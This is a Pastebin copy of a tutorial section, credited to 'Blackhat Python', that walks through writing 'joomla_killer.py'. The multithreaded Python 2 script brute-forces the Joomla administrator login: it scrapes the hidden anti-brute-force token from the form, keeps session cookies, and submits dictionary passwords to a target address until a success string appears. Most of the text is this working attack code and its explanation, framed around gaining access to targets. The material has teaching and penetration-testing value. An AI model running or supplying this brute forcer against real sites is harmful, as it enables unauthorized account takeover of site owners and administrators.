Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- In this article i will show how you can brute-force HTML from authentication using python code.
- There may come a time in your web hacking career where you need to either gain access to a target,
- or if you’re consulting, you might need to assess the password strength on an existing web system. It
- has become more and more common for web systems to have brute-force protection, whether a
- captcha, a simple math equation, or a login token that has to be submitted with the request. There are a
- number of brute forcers that can do the brute-forcing of a POST request to the login script, but in a lot
- of cases they are not flexible enough to deal with dynamic content or handle simple “are you human”
- checks. We’ll create a simple brute forcer that will be useful against Joomla, a popular content
- management system. Modern Joomla systems include some basic anti-brute-force techniques, but still
- lack account lockouts or strong captchas by default.
- In order to brute-force Joomla, we have two requirements that need to be met: retrieve the login token
- from the login form before submitting the password attempt and ensure that we accept cookies in our
- urllib2 session. In order to parse out the login form values, we’ll use the native Python class
- HTMLParser. This will also be a good whirlwind tour of some additional features of urllib2 that
- you can employ when building tooling for your own targets. Let’s get started by having a look at the
- Joomla administrator login form. This can be found by browsing to
- http://<yourtarget>.com/administrator/. For the sake of brevity, I’ve only included the relevant
- form elements.
- <form action="/administrator/index.php" method="post" id="form-login"
- class="form-inline">
- <input name="username" tabindex="1" id="mod-login-username" type="text"
- class="input-medium" placeholder="User Name" size="15"/>
- <input name="passwd" tabindex="2" id="mod-login-password" type="password"
- class="input-medium" placeholder="Password" size="15"/>
- <select id="lang" name="lang" class="inputbox advancedSelect">
- <option value="" selected="selected">Language - Default</option>
- <option value="en-GB">English (United Kingdom)</option>
- </select>
- <input type="hidden" name="option" value="com_login"/>
- <input type="hidden" name="task" value="login"/>
- <input type="hidden" name="return" value="aW5kZXgucGhw"/>
- <input type="hidden" name="1796bae450f8430ba0d2de1656f3e0ec" value="1" />
- </form>
- Reading through this form, we are privy to some valuable information that we’ll need to incorporate
- into our brute forcer. The first is that the form gets submitted to the /administrator/index.php
- path as an HTTP POST. The next are all of the fields required in order for the form submission to be
- successful. In particular, if you look at the last hidden field, you’ll see that its name attribute is set to a
- long, randomized string. This is the essential piece of Joomla’s anti-brute-forcing technique. That
- randomized string is checked against your current user session, stored in a cookie, and even if you are
- passing the correct credentials into the login processing script, if the randomized token is not present,
- the authentication will fail. This means we have to use the following request flow in our brute forcer
- in order to be successful against Joomla:
- 1. Retrieve the login page, and accept all cookies that are returned.
- 2. Parse out all of the form elements from the HTML.
- 3. Set the username and/or password to a guess from our dictionary.
- 4. Send an HTTP POST to the login processing script including all HTML form fields and our
- stored cookies.
- 5. Test to see if we have successfully logged in to the web application.
- You can see that we are going to be utilizing some new and valuable techniques in this script. I will
- also mention that you should never “train” your tooling on a live target; always set up an installation
- of your target web application with known credentials and verify that you get the desired results.
- Let’s open a new Python file named joomla_killer.py and enter the following code:
- import urllib2
- import urllib
- import cookielib
- import threading
- import sys
- import Queue
- from HTMLParser import HTMLParser
- # general settings
- user_thread = 10
- username = "admin"
- wordlist_file = "/tmp/cain.txt"
- resume = None
- # target specific settings
- target_url = "http://192.168.112.131/administrator/index.php"
- target_post = "http://192.168.112.131/administrator/index.php"
- username_field= "username"
- password_field= "passwd"
- success_check = "Administration - Control Panel"
- These general settings deserve a bit of explanation. The target_url variable is where our script
- will first download and parse the HTML. The target_post variable is where we will submit our
- brute-forcing attempt. Based on our brief analysis of the HTML in the Joomla login, we can set the
- username_field and password_field variables to the appropriate name of the HTML elements.
- Our success_check variable is a string that we’ll check for after each brute-forcing attempt in
- order to determine whether we are successful or not. Let’s now create the plumbing for our brute
- forcer; some of the following code will be familiar so I’ll only highlight the newest techniques.
- class Bruter(object):
- def __init__(self, username, words):
- self.username = username
- self.password_q = words
- self.found = False
- print "Finished setting up for: %s" % username
- def run_bruteforce(self):
- for i in range(user_thread):
- t = threading.Thread(target=self.web_bruter)
- t.start()
- def web_bruter(self):
- while not self.password_q.empty() and not self.found:
- brute = self.password_q.get().rstrip()
- jar = cookielib.FileCookieJar("cookies")
- opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
- response = opener.open(target_url)
- page = response.read()
- print "Trying: %s : %s (%d left)" % (self.username,brute,self.
- password_q.qsize())
- # parse out the hidden fields
- parser = BruteParser()
- parser.feed(page)
- post_tags = parser.tag_results
- # add our username and password fields
- post_tags[username_field] = self.username
- post_tags[password_field] = brute
- login_data = urllib.urlencode(post_tags)
- login_response = opener.open(target_post, login_data)
- login_result = login_response.read()
- if success_check in login_result:
- self.found = True
- print "[*] Bruteforce successful."
- print "[*] Username: %s" % username
- print "[*] Password: %s" % brute
- print "[*] Waiting for other threads to exit..."
- This is our primary brute-forcing class, which will handle all of the HTTP requests and manage
- cookies for us. After we grab our password attempt, we set up our cookie jar using the
- FileCookieJar class that will store the cookies in the cookies file. Next we initialize our urllib2
- opener, passing in the initialized cookie jar, which tells urllib2 to pass off any cookies to it. We
- then make the initial request to retrieve the login form. When we have the raw HTML, we pass it off
- to our HTML parser and call its feed method, which returns a dictionary of all of the retrieved
- form elements. After we have successfully parsed the HTML, we replace the username and password
- fields with our brute-forcing attempt. Next we URL encode the POST variables, and then pass
- them in our subsequent HTTP request. After we retrieve the result of our authentication attempt, we
- test whether the authentication was successful or not . Now let’s implement the core of our HTML
- processing. Add the following class to your joomla_killer.py script:
- class BruteParser(HTMLParser):
- def __init__(self):
- HTMLParser.__init__(self)
- self.tag_results = {}
- def handle_starttag(self, tag, attrs):
- if tag == "input":
- tag_name = None
- tag_value = None
- for name,value in attrs:
- if name == "name":
- tag_name = value
- if name == "value":
- tag_value = value
- if tag_name is not None:
- self.tag_results[tag_name] = value
- This forms the specific HTML parsing class that we want to use against our target. After you have the
- basics of using the HTMLParser class, you can adapt it to extract information from any web
- application that you might be attacking. The first thing we do is create a dictionary in which our
- results will be stored. When we call the feed function, it passes in the entire HTML document and
- our handle_starttag function is called whenever a tag is encountered. In particular, we’re looking
- for HTML input tags and our main processing occurs when we determine that we have found one.
- We begin iterating over the attributes of the tag, and if we find the name or value attributes, we
- associate them in the tag_results dictionary. After the HTML has been processed, our bruteforcing
- class can then replace the username and password fields while leaving the remainder of the
- fields intact.
- To wrap up our Joomla brute forcer, let’s copy-paste the build_wordlist function from our previous
- section and add the following code:
- # paste the build_wordlist function here
- words = build_wordlist(wordlist_file)
- bruter_obj = Bruter(username,words)
- bruter_obj.run_bruteforce()
- That’s it! We simply pass in the username and our wordlist to our Bruter class and watch the magic
- happen.
- Source: Blackhat Python
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement